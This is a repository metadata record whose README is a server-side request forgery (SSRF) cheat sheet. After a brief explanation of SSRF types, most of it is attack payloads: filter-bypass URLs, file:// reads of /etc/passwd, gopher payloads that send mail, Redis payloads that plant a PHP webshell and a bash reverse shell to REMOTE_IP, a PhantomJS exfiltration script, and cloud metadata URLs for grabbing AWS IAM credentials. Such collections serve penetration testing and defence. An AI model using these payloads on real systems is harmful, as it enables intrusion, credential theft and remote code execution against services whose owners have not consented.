{"id":22559934,"url":"https://github.com/paulveillard/cybersecurity-ssrf","last_synced_at":"2025-10-08T21:15:38.701Z","repository":{"id":109659009,"uuid":"459271170","full_name":"paulveillard/cybersecurity-ssrf","owner":"paulveillard","description":" An ongoing \u0026 curated collection of awesome web vulnerability - Server-side request forgery software practices and remediation, libraries and frameworks, best guidelines and technical resources about SSRF","archived":false,"fork":false,"pushed_at":"2022-02-22T01:07:58.000Z","size":1196,"stargazers_count":17,"open_issues_count":0,"forks_count":2,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-04-10T09:38:29.878Z","etag":null,"topics":["cybersecurity","mitigation","remediation","security","security-tools","server-side","server-side-request-forgery","ssrf","vulnerabilities","vulnerability","vulnerability-assessment","vulnerability-detection","vulnerability-management"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/paulveillard.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":"code-of-conduct.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-02-14T18:04:25.000Z","updated_at":"2025-02-22T11:47:14.000Z","dependencies_parsed_at":"2023-04-28T10:46:13.603Z","dependency_job_id":null,"html_url":"https://github.com/paulveillard/cybersecurity-ssrf","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/paulveillard/cybersecurity-ssrf","repository_url":"https://repos.ecosyste.ms/api/v1/h
osts/GitHub/repositories/paulveillard%2Fcybersecurity-ssrf","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-ssrf/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-ssrf/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-ssrf/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/paulveillard","download_url":"https://codeload.github.com/paulveillard/cybersecurity-ssrf/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-ssrf/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271887734,"owners_count":24839137,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-24T02:00:11.135Z","response_time":111,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","mitigation","remediation","security","security-tools","server-side","server-side-request-forgery","ssrf","vulnerabilities","vulnerability","vulnerability-assessment","vulnerability-detection","vulnerability-management"],"created_at":"2024-12-07T21:10:10.722Z","updated_at":"2025-10-08T21:15:33.651Z","avatar_url":"https://github.com/paulveillard.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"
readme":"# Server-Side Request Forgery (SSRF)\n\u003e An ongoing \u0026 curated collection of awesome web vulnerability - Server-side request forgery software practices and remediation, libraries and frameworks, best guidelines and technical resources about SSRF.\n\n## `What is Server Side Request Forgery (SSRF)?`\n- [A Server-Side Request Forgery (SSRF)](https://en.wikipedia.org/wiki/Server-side_request_forgery) attack involves an attacker abusing server functionality to access or modify resources. \n\n ![attacker](https://github.com/paulveillard/cybersecurity-ssrf/blob/main/img/server-side-request-forgery.png)\n \nThe attacker targets an application that supports data imports from URLs or allows them to read data from URLs. URLs can be manipulated, either by replacing them with new ones or by tampering with URL path traversal.\n\n- Typically, attackers supply a URL (or modify an existing one) and the code running on the server reads or submits data to it. Attackers can leverage URLs to gain access to internal data and services that were not meant to be exposed – including HTTP-enabled databases and server configuration data.\n\n- Once an attacker has tampered with the request, the server receives it and attempts to read data from the altered URL. Even for services that aren’t exposed directly on the public internet, attackers can select a target URL, which enables them to read the data.\n\n\n## `Types Of SSRF :`\n### 1. Blind SSRF: \nIn a blind SSRF, the attacker is not able to control the data of packet B that is sent to the application in a trusted internal network. Here the attacker can control the IP address and ports of the server. 
To exploit this type of SSRF we have to supply a URL followed by a colon and a port number; by observing the responses and error messages from the server we can find the open and closed ports of the server. We have to try this procedure for different ports to check their status.\n```\nExample :\n\nhttp://example.com:1337\nhttp://example.com:9923\nhttp://example.com:43\nhttp://example.com:22\n```\n\n![blind](https://github.com/paulveillard/cybersecurity-ssrf/blob/main/img/Blind-SSRF.png)\n\n### 2. Limited Response / Partial SSRF :\nIn this type of SSRF we get a limited response from the server, such as the title of the page, or we get access to resources but can’t see the data. We can control only certain parts of packet B that arrives at the internal application. This type of vulnerability can be used to read local system files such as /etc/config, /etc/hosts, /etc/passwd and many others. By using the file:// protocol we can read files on the system. In some cases vulnerabilities such as XXE injection or DDoS may be useful to exploit a partial SSRF vulnerability.\n\n```\nExample :\n\nfile:///etc/hosts\nfile:///etc/config\nfile:///etc/passwd\n```\n\n### 3. Full Response SSRF :\nIn full SSRF we have complete control over packet B (shown in the figure). Now we can access the services running on the internal network and find vulnerabilities in the internal network. In this type of SSRF we can use protocols like file://, dict://, http://, gopher://, etc. Here we have a large scope for creating different requests and exploiting the internal network if any vulnerabilities are present. 
A full SSRF vulnerability may cause the application to crash through a buffer overflow: sending a large string in the request causes the buffer overflow.\n\n```\nExample :\n\nhttp://192.168.1.8/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\nBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\n```\n\n## Potential Blocks During Testing SSRF Vulnerability :\n\n- Whitelisting: The server allows only a few domain names to be used in the request. The server has a whitelist of domains; only if the domain name in the request matches a domain name on that list does it accept the request, otherwise the server declines the request.\n- Blacklisting: The server discards all requests containing IP addresses, domain names or keywords from the blacklist of the server.\n- Restricted content: The server allows the user to access only a particular number of files; it allows only a few file extension types for public access.\n\n\n## Key Points To Test SSRF Vulnerability :\n\n1. Always make sure that you are making the request to the back-end server on behalf of the public server, not from the browser.\n2. To fetch data from the server, also try http://localhost/xyz/ along with http://127.0.0.1/xyz.\n3. The server may have firewall protection; always try to bypass the firewall if possible.\n4. 
Make sure that request is coming from server not from your local host.\n\n\n\n# Server-Side Request Forgery\n\n\u003e Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.\n\n## Table of Contents\n* [Introduction](#server-side-request-forgery-ssrf)\n* [Tools](#tools)\n* [Payloads with localhost](#payloads-with-localhost)\n* [Bypassing filters](#bypassing-filters)\n  * [Bypass using HTTPS](#bypass-using-https)\n  * [Bypass localhost with [::]](#bypass-localhost-with-)\n  * [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)\n  * [Bypass localhost with CIDR](#bypass-localhost-with-cidr)\n  * [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)\n  * [Bypass using octal IP](#bypass-using-octal-ip)\n  * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)\n  * [Bypass using malformed urls](#bypass-using-malformed-urls)\n  * [Bypass using rare address](#bypass-using-rare-address)\n  * [Bypass using URL encoding](#bypass-using-url-encoding)\n  * [Bypass using bash variables](#bypass-using-bash-variables)\n  * [Bypass using tricks combination](#bypass-using-tricks-combination)\n  * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)\n  * [Bypass filter_var() php function](#bypass-filter_var-php-function)\n  * [Bypass against a weak parser](#bypass-against-a-weak-parser)\n  * [Bypassing using jar protocol (java only)](#bypassing-using-jar-protocol-java-only)\n* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)\n  * [file://](#file)\n  * [http://](#http)\n  * [dict://](#dict)\n  * [sftp://](#sftp)\n  * [tftp://](#tftp)\n  * [ldap://](#ldap)\n  * [gopher://](#gopher)\n  * [netdoc://](#netdoc)\n* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)\n* [SSRF exploiting Redis](#ssrf-exploiting-redis)\n* [SSRF exploiting PDF file](#ssrf-exploiting-pdf-file)\n* [Blind 
SSRF](#blind-ssrf)\n* [SSRF to XSS](#ssrf-to-xss)\n* [SSRF from XSS](#ssrf-from-xss)\n* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)\n  * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)\n  * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)\n  * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)\n  * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda)\n  * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)\n  * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean)\n  * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud)\n  * [SSRF URL for Azure](#ssrf-url-for-azure)\n  * [SSRF URL for OpenStack/RackSpace](#ssrf-url-for-openstackrackspace)\n  * [SSRF URL for HP Helion](#ssrf-url-for-hp-helion)\n  * [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)\n  * [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)\n  * [SSRF URL for Alibaba](#ssrf-url-for-alibaba)\n  * [SSRF URL for Docker](#ssrf-url-for-docker)\n  * [SSRF URL for Rancher](#ssrf-url-for-rancher)\n\n## `Tools`\n\n- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)\n- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)\n- [See-SURF - https://github.com/In3tinct/See-SURF](https://github.com/In3tinct/See-SURF)\n- [SSRF Sheriff - https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff)\n\n## `Payloads with localhost`\n\nBasic SSRF v1\n\n```powershell\nhttp://127.0.0.1:80\nhttp://127.0.0.1:443\nhttp://127.0.0.1:22\nhttp://0.0.0.0:80\nhttp://0.0.0.0:443\nhttp://0.0.0.0:22\n```\n\nBasic SSRF - Alternative version\n\n```powershell\nhttp://localhost:80\nhttp://localhost:443\nhttp://localhost:22\n```\n\n## `Bypassing filters`\n\n### Bypass using HTTPS\n\n```powershell\nhttps://127.0.0.1/\nhttps://localhost/\n```\n\n### Bypass localhost with [::]\n\n```powershell\nhttp://[::]:80/\nhttp://[::]:25/ SMTP\nhttp://[::]:22/ SSH\nhttp://[::]:3128/ 
Squid\n```\n\n```powershell\nhttp://0000::1:80/\nhttp://0000::1:25/ SMTP\nhttp://0000::1:22/ SSH\nhttp://0000::1:3128/ Squid\n```\n\n### Bypass localhost with a domain redirection\n\n```powershell\nhttp://spoofed.burpcollaborator.net\nhttp://localtest.me\nhttp://customer1.app.localhost.my.company.127.0.0.1.nip.io\nhttp://mail.ebc.apple.com redirect to 127.0.0.6 == localhost\nhttp://bugbounty.dod.network redirect to 127.0.0.2 == localhost\n```\n\nThe service nip.io is awesome for that, it will convert any ip address as a dns.\n\n```powershell\nNIP.IO maps \u003canything\u003e.\u003cIP Address\u003e.nip.io to the corresponding \u003cIP Address\u003e, even 127.0.0.1.nip.io maps to 127.0.0.1\n```\n\n### Bypass localhost with CIDR \n\nIt's a /8\n\n```powershell\nhttp://127.127.127.127\nhttp://127.0.1.3\nhttp://127.0.0.0\n```\n\n### Bypass using a decimal IP location\n\n```powershell\nhttp://2130706433/ = http://127.0.0.1\nhttp://3232235521/ = http://192.168.0.1\nhttp://3232235777/ = http://192.168.1.1\nhttp://2852039166/  = http://169.254.169.254\n```\n\n### Bypass using octal IP\n\nImplementations differ on how to handle octal format of ipv4.\n\n```sh\nhttp://0177.0.0.1/ = http://127.0.0.1\nhttp://o177.0.0.1/ = http://127.0.0.1\nhttp://0o177.0.0.1/ = http://127.0.0.1\nhttp://q177.0.0.1/ = http://127.0.0.1\n...\n```\n\nRef: \n- [DEFCON 29-KellyKaoudis SickCodes-Rotten code, aging standards \u0026 pwning IPv4 parsing](https://www.youtube.com/watch?v=_o1RPJAe4kU)\n- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)\n\n\n### Bypass using IPv6/IPv4 Address Embedding\n\n[IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)\n\n```powershell\nhttp://[0:0:0:0:0:ffff:127.0.0.1]\n```\n\n### Bypass using malformed urls\n\n```powershell\nlocalhost:+11211aaa\nlocalhost:00011211aaaa\n```\n\n### Bypass using rare address\n\nYou can short-hand IP addresses by 
dropping the zeros\n\n```powershell\nhttp://0/\nhttp://127.1\nhttp://127.0.1\n```\n\n### Bypass using URL encoding\n\n[Single or double encode a specific URL to bypass blacklist](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter)\n\n```powershell\nhttp://127.0.0.1/%61dmin\nhttp://127.0.0.1/%2561dmin\n```\n\n### Bypass using bash variables \n\n(curl only)\n\n```powershell\ncurl -v \"http://evil$google.com\"\n$google = \"\"\n```\n\n### Bypass using tricks combination\n\n```powershell\nhttp://1.1.1.1 \u0026@2.2.2.2# @3.3.3.3/\nurllib2 : 1.1.1.1\nrequests + browsers : 2.2.2.2\nurllib : 3.3.3.3\n```\n\n### Bypass using enclosed alphanumerics \n\n[@EdOverflow](https://twitter.com/EdOverflow)\n\n```powershell\nhttp://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com\n\nList:\n① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿\n```\n\n### Bypass filter_var() php function\n\n```powershell\n0://evil.com:80;http://google.com:80/ \n```\n\n### Bypass against a weak parser\n\nby Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))\n\n```powershell\nhttp://127.1.1.1:80\\@127.2.2.2:80/\nhttp://127.1.1.1:80\\@@127.2.2.2:80/\nhttp://127.1.1.1:80:\\@@127.2.2.2:80/\nhttp://127.1.1.1:80#\\@127.2.2.2:80/\n```\n\n![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)\n\n### Bypassing using a redirect\n[using a 
redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)\n\n```powershell\n1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)\n2. Launch the SSRF pointing to  vulnerable.com/index.php?url=http://YOUR_SERVER_IP\nvulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1\n```\n\n### Bypassing using type=url\n\n```powershell\nChange \"type=file\" to \"type=url\"\nPaste URL in text field and hit enter\nUsing this vulnerability users can upload images from any image URL = trigger an SSRF\n```\n\n### Bypassing using DNS Rebinding (TOCTOU)\n\n```powershell\nCreate a domain that change between two IPs. http://1u.ms/ exists for this purpose.\nFor example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain:\nmake-1.2.3.4-rebind-169.254-169.254-rr.1u.ms\n```\n\n### Bypassing using jar protocol (java only)\n\nBlind SSRF\n\n```powershell\njar:scheme://domain/path!/ \njar:http://127.0.0.1!/\njar:https://127.0.0.1!/\njar:ftp://127.0.0.1!/\n```\n\n## SSRF exploitation via URL Scheme\n\n### File \n\nAllows an attacker to fetch the content of a file on the server\n\n```powershell\nfile://path/to/file\nfile:///etc/passwd\nfile://\\/\\/etc/passwd\nssrf.php?url=file:///etc/passwd\n```\n\n### HTTP\n\nAllows an attacker to fetch any content from the web, it can also be used to scan ports.\n\n```powershell\nssrf.php?url=http://127.0.0.1:22\nssrf.php?url=http://127.0.0.1:80\nssrf.php?url=http://127.0.0.1:443\n```\n\n![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png?raw=true)\n\nThe following URL scheme can be used to probe the network\n\n### Dict\n\nThe DICT URL scheme is used to refer to definitions or word lists available using the DICT 
protocol:\n\n```powershell\ndict://\u003cuser\u003e;\u003cauth\u003e@\u003chost\u003e:\u003cport\u003e/d:\u003cword\u003e:\u003cdatabase\u003e:\u003cn\u003e\nssrf.php?url=dict://attacker:11111/\n```\n\n### SFTP \n\nA network protocol used for secure file transfer over secure shell\n\n```powershell\nssrf.php?url=sftp://evil.com:11111/\n```\n\n### TFTP\n\nTrivial File Transfer Protocol, works over UDP\n\n```powershell\nssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET\n```\n\n### LDAP\n\nLightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.\n\n```powershell\nssrf.php?url=ldap://localhost:11211/%0astats%0aquit\n```\n\n### Gopher\n\n```powershell\nssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a\n\nwill make a request like\nHELO localhost\nMAIL FROM:\u003chacker@site.com\u003e\nRCPT TO:\u003cvictim@site.com\u003e\nDATA\nFrom: [Hacker] \u003chacker@site.com\u003e\nTo: \u003cvictime@site.com\u003e\nDate: Tue, 15 Sep 2017 17:20:26 -0400\nSubject: Ah Ah AH\n\nYou didn't say the magic word !\n\n\n.\nQUIT\n```\n\n#### Gopher HTTP\n\n```powershell\ngopher://\u003cproxyserver\u003e:8080/_GET http://\u003cattacker:80\u003e/x HTTP/1.1%0A%0A\ngopher://\u003cproxyserver\u003e:8080/_POST%20http://\u003cattacker\u003e:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body\n```\n\n#### Gopher SMTP - Back connect to 1337\n\n```php\nContent of evil.com/redirect.php:\n\u003c?php\nheader(\"Location: gopher://hack3r.site:1337/_SSRF%0ATest!\");\n?\u003e\n\nNow query 
it.\nhttps://example.com/?q=http://evil.com/redirect.php.\n```\n\n#### Gopher SMTP - send a mail\n\n```php\nContent of evil.com/redirect.php:\n\u003c?php\n        $commands = array(\n                'HELO victim.com',\n                'MAIL FROM: \u003cadmin@victim.com\u003e',\n                'RCPT To: \u003csxcurity@oou.us\u003e',\n                'DATA',\n                'Subject: @sxcurity!',\n                'Corben was here, woot woot!',\n                '.'\n        );\n\n        $payload = implode('%0A', $commands);\n\n        header('Location: gopher://0:25/_'.$payload);\n?\u003e\n```\n\n### Netdoc\n\nWrapper for Java when your payloads struggle with \"\\n\" and \"\\r\" characters.\n\n```powershell\nssrf.php?url=netdoc:///etc/passwd\n``` \n\n## SSRF exploiting WSGI\n\nExploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py.\n\n```powershell\ngopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py\n```\n\n| Header    |           |             |\n|-----------|-----------|-------------|\n| modifier1 | (1 byte)  | 0 (%00)     |\n| datasize  | (2 bytes) | 26 (%1A%00) |\n| modifier2 | (1 byte)  | 0 (%00)     |\n\n| Variable (UWSGI_FILE) |           |    |            |   |\n|-----------------------|-----------|----|------------|---|\n| key length            | (2 bytes) | 10 | (%0A%00)   |   |\n| key data              | (m bytes) |    | UWSGI_FILE |   |\n| value length          | (2 bytes) | 12 | (%0C%00)   |   |\n| value data            | (n bytes) |    | /tmp/test.py   |   |\n\t\n\n## SSRF exploiting Redis\n\n\u003e Redis is a database system that stores everything in RAM\n\n```powershell\n# Getting a webshell\nurl=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html\nurl=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php\nurl=dict://127.0.0.1:6379/SET%20mykey%20\"\u003c\\x3Fphp system($_GET[0])\\x3F\u003e\"\nurl=dict://127.0.0.1:6379/SAVE\n\n# 
Getting a PHP reverse shell\ngopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml\ngopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php\ngopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22\ngopher://127.0.0.1:6379/_save\n```\n\n## SSRF exploiting PDF file\n\n![https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png)\n\nExample with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c\u0026feature=emb_title)\n\n```powershell\n\u003clink rel=attachment href=\"file:///root/secret.txt\"\u003e\n```\n\nExample with PhantomJS \n\n```js\n\u003cscript\u003e\n    exfil = new XMLHttpRequest();\n    exfil.open(\"GET\",\"file:///etc/passwd\");\n    exfil.send();\n    exfil.onload = function(){document.write(this.responseText);}\n    exfil.onerror = function(){document.write('failed!')}\n\u003c/script\u003e\n```\n\n## Blind SSRF\n\n\u003e When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. 
\n\nUse an SSRF chain to gain an Out-of-Band output.\n\nFrom https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/ / https://github.com/assetnote/blind-ssrf-chains\n\n**Possible via HTTP(s)**\n- [Elasticsearch](https://github.com/assetnote/blind-ssrf-chains#elasticsearch)\n- [Weblogic](https://github.com/assetnote/blind-ssrf-chains#weblogic)\n- [Hashicorp Consul](https://github.com/assetnote/blind-ssrf-chains#consul)\n- [Shellshock](https://github.com/assetnote/blind-ssrf-chains#shellshock)\n- [Apache Druid](https://github.com/assetnote/blind-ssrf-chains#druid)\n- [Apache Solr](https://github.com/assetnote/blind-ssrf-chains#solr)\n- [PeopleSoft](https://github.com/assetnote/blind-ssrf-chains#peoplesoft)\n- [Apache Struts](https://github.com/assetnote/blind-ssrf-chains#struts)\n- [JBoss](https://github.com/assetnote/blind-ssrf-chains#jboss)\n- [Confluence](https://github.com/assetnote/blind-ssrf-chains#confluence)\n- [Jira](https://github.com/assetnote/blind-ssrf-chains#jira)\n- [Other Atlassian Products](https://github.com/assetnote/blind-ssrf-chains#atlassian-products)\n- [OpenTSDB](https://github.com/assetnote/blind-ssrf-chains#opentsdb)\n- [Jenkins](https://github.com/assetnote/blind-ssrf-chains#jenkins)\n- [Hystrix Dashboard](https://github.com/assetnote/blind-ssrf-chains#hystrix)\n- [W3 Total Cache](https://github.com/assetnote/blind-ssrf-chains#w3)\n- [Docker](https://github.com/assetnote/blind-ssrf-chains#docker)\n- [Gitlab Prometheus Redis Exporter](https://github.com/assetnote/blind-ssrf-chains#redisexporter)\n\n**Possible via Gopher**\n- [Redis](https://github.com/assetnote/blind-ssrf-chains#redis)\n- [Memcache](https://github.com/assetnote/blind-ssrf-chains#memcache)\n- [Apache Tomcat](https://github.com/assetnote/blind-ssrf-chains#tomcat)\n\n\n## SSRF to XSS \n\nby [@D0rkerDevil \u0026 @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)\n\n```bash\nhttp://brutelogic.com.br/poc.svg 
-\u003e simple alert\nhttps://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -\u003e simple ssrf\n\nhttps://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg\n```\n\n## SSRF from XSS\n\n### Using an iframe\n\nThe content of the file will be integrated inside the PDF as an image or text.\n\n```html\n\u003cimg src=\"echopwn\" onerror=\"document.write('\u003ciframe src=file:///etc/passwd\u003e\u003c/iframe\u003e')\"/\u003e\n```\n\n### Using an attachment\n\nExample of a PDF attachment using HTML \n\n1. use `\u003clink rel=attachment href=\"URL\"\u003e` as Bio text\n2. use 'Download Data' feature to get PDF\n3. use `pdfdetach -saveall filename.pdf` to extract embedded resource\n4. `cat attachment.bin`\n\n## SSRF URL for Cloud Instances\n\n### SSRF URL for AWS Bucket\n\n[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)\nInteresting path to look for at `http://169.254.169.254` or `http://instance-data`\n\n```powershell\nAlways here : /latest/meta-data/{hostname,public-ipv4,...}\nUser data (startup script for auto-scaling) : /latest/user-data\nTemporary AWS credentials : /latest/meta-data/iam/security-credentials/\n```\n\nDNS record\n\n```powershell\nhttp://instance-data\nhttp://169.254.169.254\nhttp://169.254.169.254.nip.io/\n```\n\nHTTP redirect\n\n```powershell\nStatic:http://nicob.net/redir6a\nDynamic:http://nicob.net/redir-http-169.254.169.254:80-\n```\n\nAlternate IP encoding\n\n```powershell\nhttp://425.510.425.510/ Dotted decimal with overflow\nhttp://2852039166/ Dotless decimal\nhttp://7147006462/ Dotless decimal with overflow\nhttp://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal\nhttp://0xA9FEA9FE/ Dotless hexadecimal\nhttp://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow\nhttp://0251.0376.0251.0376/ Dotted octal\nhttp://0251.00376.000251.0000376/ Dotted octal with padding\n```\n\nMore urls to 
include\n\n```powershell\nhttp://169.254.169.254/latest/user-data\nhttp://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]\nhttp://169.254.169.254/latest/meta-data/\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance\nhttp://169.254.169.254/latest/meta-data/ami-id\nhttp://169.254.169.254/latest/meta-data/reservation-id\nhttp://169.254.169.254/latest/meta-data/hostname\nhttp://169.254.169.254/latest/meta-data/public-keys/\nhttp://169.254.169.254/latest/meta-data/public-keys/0/openssh-key\nhttp://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/dummy\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/s3access\nhttp://169.254.169.254/latest/dynamic/instance-identity/document\n```\n\nAWS SSRF Bypasses\n```\nConverted Decimal IP: http://2852039166/latest/meta-data/\nIPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/\nIPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/\nIPV6/IPV4: http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/\n```\n\nE.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`\n\nE.g2: Flaws challenge - 